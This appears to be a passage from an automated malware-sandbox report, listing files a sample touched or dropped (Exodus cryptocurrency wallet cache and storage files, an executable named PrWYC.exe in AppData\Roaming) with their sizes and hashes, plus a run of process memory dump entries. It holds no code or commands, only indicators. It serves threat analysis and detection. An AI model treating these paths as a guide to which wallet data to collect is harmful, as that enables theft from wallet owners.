Filesize
5.2MB

MD5
6c15525e130834b1d10adba428499b8a

SHA1
d2d5d55fd05d54ee60ee8dcd1932e437e186b8d7

SHA256
257e0993508f2f09144401f2d21b138051da96ab733d07e75dd08dda436ca3b6

SHA512
7a429e16a3d2007ec21ca21ec091f7088e724ceeff85aab18c270367cbb2014657fc5a0a943a27edacce98d6c85fdfe015ebb04f83d13c7db094d8d5d62dc3a7

Download Submit
C:\Users\Admin\AppData\Roaming\Exodus\Code Cache\js\index-dir\the-real-index

Filesize
48B

MD5
193012e8b4fbb5fa3c0e9d4b41fe552c

SHA1
5f84de2fa43afe151a82d6334ab42b348155dc9f

SHA256
c6d40713e86e014b3478751bde947806428b38fd227cb2152b8fc90c6115ec90

SHA512
408b31bfc72d671fe0ed511689daa547b262a3c363bc5c4286b7d3b77ab9b23ae6b34a2568297040bb14db2530b059ef4f78aa88e2bfd71a1adb7f4e44a7d48c

Download Submit
C:\Users\Admin\AppData\Roaming\Exodus\Code Cache\wasm\index

Filesize
24B

MD5
54cb446f628b2ea4a5bce5769910512e

SHA1
c27ca848427fe87f5cf4d0e0e3cd57151b0d820d

SHA256
fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d

SHA512
8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

Download Submit
C:\Users\Admin\AppData\Roaming\Exodus\Code Cache\wasm\index-dir\the-real-index

Filesize
48B

MD5
e561a524f1289d226f845f34e31ae0ba

SHA1
66830ffdc93ed3138a8d088bdf0002c027877111

SHA256
4eb4d2113a711ecae7d8f9d72c4c9ad9569f5bba9673ab32c1dcf66ff8c0c721

SHA512
8530bf1398b6e631b7820b02f56a48df3a5be8d5f4e484353ff7bd857e648e41cc8d5ed4eefdb5cfba8cb3740ded4bb4c254aaa9655dd025fd80c79603a521b9

Download Submit
C:\Users\Admin\AppData\Roaming\Exodus\Local State

Filesize
434B

MD5
8fc91462ea2f0399dcf82a141ad14e86

SHA1
da576b60e456d99e69620c7b07d8f7b4cb560308

SHA256
ce9f55ad07f6254fbe731263d4c7dd1abfe18dd39877492207c6fbc4e09b81e2

SHA512
a4e267738702abde7351281ffc559bf923f4de367410a2193ba69e9acdde4a4a787947b8404aa06b9b8d33cbca65e8bc418f26e6fa2d18ee48caa2fc20d13b4b

Download Submit
C:\Users\Admin\AppData\Roaming\Exodus\Local Storage\leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Roaming\Exodus\Local Storage\leveldb\LOG

Filesize
243B

MD5
f2adf2b155180c595c6654553c0131d4

SHA1
68a192f8c38180506aa300201ed27a61534449c6

SHA256
68f10fbaff8366cd47374d932dc1e7721efba94b38c591590925b408482582a3

SHA512
3ecd56b570b49eb500a98dfaab4760ad2c2690f767e64d065e90515034ce0ff43e216a80bbb1d78980c322d0efab668a65ba4c1482ddd8fd2b14794d3da5189f

Download Submit
C:\Users\Admin\AppData\Roaming\Exodus\Local Storage\leveldb\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Roaming\Exodus\Network\Network Persistent State

Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Download Submit
C:\Users\Admin\AppData\Roaming\Exodus\Network\Network Persistent State

Filesize
61B

MD5
4df4574bfbb7e0b0bc56c2c9b12b6c47

SHA1
81efcbd3e3da8221444a21f45305af6fa4b71907

SHA256
e1b77550222c2451772c958e44026abe518a2c8766862f331765788ddd196377

SHA512
78b14f60f2d80400fe50360cf303a961685396b7697775d078825a29b717081442d357c2039ad0984d4b622976b0314ede8f478cde320daec118da546cb0682a

Download Submit
C:\Users\Admin\AppData\Roaming\Exodus\Network\Trust Tokens

Filesize
36KB

MD5
ba18bf06e5b76061522cdef07791ab8d

SHA1
3a237d7dc0ce618f9dadd49d9841548e3dd1302a

SHA256
9e73b896c702a73bc8cc8b2d8f9b8ffa303581802ebb26f95c34793a4cd12fca

SHA512
382012db8ae451368ad429c60cb7cd8e21842dfbbe8c7e8d43ede29cdfb06fb76774365d07e7eb1ec37874f4f99f75299d0629c4ca2583683a573919c026fd1c

Download Submit
C:\Users\Admin\AppData\Roaming\Exodus\Preferences

Filesize
91B

MD5
3af821011542ab3d7cf76115354071fa

SHA1
f192f162f5ca0ebc05789b0a06cdcb17bf3e1035

SHA256
40cd2b78adad9f9fe68c02e0936bd81f0845da1b3550a40c299373187597f689

SHA512
e212e929424d2a4d08eabc1a9278f75563cf0a1edc6c511b41587a7475fd4db558526a770bb5580f00090352da86433329353d6eec726579f5a257b2c03b5090

Download Submit
C:\Users\Admin\AppData\Roaming\Exodus\Shared Dictionary\cache\index-dir\the-real-index

Filesize
48B

MD5
7dfc9bb0c38a9168e557eacca720202d

SHA1
aa43fb32d1cf46e8958cf713fd75e1ba2e2eb79b

SHA256
d2598fb4c007e2a8d535943ce1024b6048f3bd94b50502cbeefad845d9a3b0c8

SHA512
06d03c38259d9c513901c5706db077c80152688b2623ed3dd266a5b284b8685271b26c6deba64c4dd10054e6390a5d15925e53bc700bb9717b2890c510e89df3

Download Submit
C:\Users\Admin\AppData\Roaming\Exodus\Shared Dictionary\db

Filesize
44KB

MD5
358d089087aa109e41f38ddda1ff8368

SHA1
42f68e8e7c6806485aab068ad2ef9d8992fe3867

SHA256
e1ea1994a9c238120944c0009b25c9b75c3b8acb5cc137a78cd4a8450c809130

SHA512
4630eba964ce1dccfbb8663f04141c91ff0a3cee399621637bdef17c696735316da23a5bf6f7235b9616005652d175e276e83c8aca5f99f9f3b4d9c713818553

Download Submit
C:\Users\Admin\AppData\Roaming\PrWYC.exe

Filesize
176KB

MD5
d90f3c113c3b95b0239274d484332075

SHA1
4295888246e934b2aed8cbd240839e16c109c1f7

SHA256
0bd3556f8ba49f440334cae1872e4106b690ee3c312ea122c72559178db7a5ee

SHA512
571f62848561db92fcac4d929c9e97946e1256359cb86e0df9944b6a74d2ee64e89f208c49e6e0adf54f65638078bc89d2ba386386f35e63a4cc2d3fa0b366c4

Download Submit
memory/952-20-0x0000000009D00000-0x000000000A2A6000-memory.dmp

Filesize
5.6MB

Download
memory/952-23-0x0000000002AD0000-0x0000000002ADC000-memory.dmp

Filesize
48KB

Download
memory/952-16-0x00000000007C0000-0x00000000007F6000-memory.dmp

Filesize
216KB

Download
memory/952-25-0x00000000051F0000-0x000000000528C000-memory.dmp

Filesize
624KB

Download
memory/952-18-0x00000000010E0000-0x00000000010E6000-memory.dmp

Filesize
24KB

Download
memory/968-56-0x0000000004CB0000-0x0000000004CEC000-memory.dmp

Filesize
240KB

Download
memory/968-53-0x0000000006580000-0x0000000006B98000-memory.dmp

Filesize
6.1MB

Download
memory/968-49-0x0000000004AB0000-0x0000000004B42000-memory.dmp

Filesize
584KB

Download
memory/968-48-0x0000000000570000-0x00000000005C2000-memory.dmp

Filesize
328KB

Download
memory/968-55-0x0000000004C40000-0x0000000004C52000-memory.dmp

Filesize
72KB

Download
memory/968-54-0x0000000004DF0000-0x0000000004EFA000-memory.dmp

Filesize
1.0MB

Download
memory/968-50-0x0000000004B70000-0x0000000004B7A000-memory.dmp

Filesize
40KB

Download
memory/1228-241-0x0000000005570000-0x0000000005590000-memory.dmp

Filesize
128KB

Download
memory/1656-199-0x00000000006C0000-0x00000000008DC000-memory.dmp

Filesize
2.1MB

Download
memory/2856-173-0x000000000ACE0000-0x000000000ACEE000-memory.dmp

Filesize
56KB

Download
memory/2856-101-0x00000000005F0000-0x00000000007B4000-memory.dmp

Filesize
1.8MB

Download
memory/2856-172-0x000000000AD00000-0x000000000AD38000-memory.dmp

Filesize
224KB

Download
memory/4440-69-0x00000000072F0000-0x000000000796A000-memory.dmp

Filesize
6.5MB

Download
memory/4440-17-0x00000000020E0000-0x0000000002116000-memory.dmp

Filesize
216KB

Download
memory/4440-70-0x0000000005F90000-0x0000000005FAA000-memory.dmp

Filesize
104KB

Download
memory/5016-22-0x0000000005DB0000-0x0000000005E16000-memory.dmp

Filesize
408KB

Download
memory/5016-21-0x0000000005D10000-0x0000000005D32000-memory.dmp

Filesize
136KB

Download
memory/5016-38-0x0000000005E90000-0x00000000061E7000-memory.dmp

Filesize
3.3MB

Download
memory/5016-84-0x0000000007A50000-0x0000000007AE6000-memory.dmp

Filesize
600KB

Download
memory/5016-72-0x0000000007850000-0x000000000785A000-memory.dmp

Filesize
40KB

Download
memory/5016-57-0x0000000007630000-0x0000000007662000-memory.dmp

Filesize
200KB

Download
memory/5016-19-0x0000000005610000-0x0000000005CDA000-memory.dmp

Filesize
6.8MB

Download
memory/5016-24-0x0000000005E20000-0x0000000005E86000-memory.dmp

Filesize
408KB

Download
memory/5016-71-0x00000000076B0000-0x0000000007753000-memory.dmp

Filesize
652KB

Download
memory/5016-58-0x000000006D690000-0x000000006D6DC000-memory.dmp

Filesize
304KB

Download
memory/5016-68-0x0000000007690000-0x00000000076AE000-memory.dmp

Filesize
120KB

Download
memory/5016-52-0x00000000069D0000-0x0000000006A1C000-memory.dmp

Filesize
304KB

Download
memory/5016-51-0x0000000006480000-0x000000000649E000-memory.dmp

Filesize
120KB

Download